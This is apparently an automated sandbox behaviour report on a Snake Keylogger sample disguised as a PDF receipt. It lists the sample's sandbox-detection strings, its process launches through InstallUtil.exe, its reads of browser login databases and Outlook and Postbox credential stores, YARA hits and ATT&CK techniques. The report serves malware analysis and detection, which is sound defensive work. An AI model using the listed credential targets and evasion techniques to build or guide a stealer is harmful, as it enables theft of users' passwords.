Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596857	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596744	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595964	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595637	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594649	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594294	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594148	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594046	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 98905	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 98783	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 98667	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 98219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 98095	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96404	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 96046	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 95926	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 95635	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 95500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 95391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 95281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 95172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 95059	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 94937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 94828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 94718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 94609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 94500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 94391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Thread delayed: delay time: 94266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598115	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: InstallUtil.exe, 00000007.00000002.4213478562.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: RequiredContract.exe, 00000006.00000002.2010883773.0000000001493000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: dekont_001.pdf.exe, 00000000.00000002.1842745906.00000000063E0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemUhAaE4tNqKKbf4eX
Source: dekont_001.pdf.exe, 00000000.00000002.1828392738.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212777501.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 1_2_066A7B70 LdrInitializeThunk,

1_2_066A7B70

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\RequiredContract.exe "C:\Users\user\AppData\Roaming\RequiredContract.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Queries volume information: C:\Users\user\Desktop\dekont_001.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Queries volume information: C:\Users\user\AppData\Roaming\RequiredContract.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4215771932.0000000003054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4215341701.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4215771932.0000000003054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4215341701.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Scheduled Task/Job	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
